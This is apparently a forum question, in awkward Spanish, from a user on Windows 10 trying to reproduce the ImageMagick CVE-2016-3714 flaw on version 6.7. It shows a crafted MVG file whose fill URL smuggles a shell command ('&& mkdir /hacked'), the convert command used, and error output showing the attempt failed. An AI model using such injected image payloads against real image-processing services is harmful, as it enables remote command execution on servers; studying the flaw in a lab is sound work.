He instalado una versión vulnerable de la imagen magick, es decir, 6.7 y, de acuerdo con este CVE-2016–3714, es una versión vulnerable. Ahora, ¿por qué lo descargué para obtener una imagen clara de esta vulnerabilidad?
Problema.
A continuación se muestra el código de mi archivo para test.png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops.jpg" && mkdir" /hacked )'
pop graphic-context
ya que soy un usuario de la ventana 10.
Ahora, cuando lo ejecuto a través del terminal como este convert test.png test2.jpg , lo que vi en el error es
convert.exe: unrecognized color 'https://127.0.0.1/oops.jpg" && mkdir" /hacked ' @ warning/color.c/GetColorCompliance/947.
convert.exe: no decode delegate for this image format '//127.0.0.1/oops.jpg" && mkdir" /hacked ' @ error/constitute.c/ReadImage/532.
convert.exe: Non-conforming drawing primitive definition 'fill' @ error/draw.c/DrawImage/3146.
Ahora realmente no tengo ninguna idea sobre el problema, todo lo que sé es que definitivamente tengo una versión vulnerable pero no puedo explotarla.
Apreciaré cualquier respuesta.
Gracias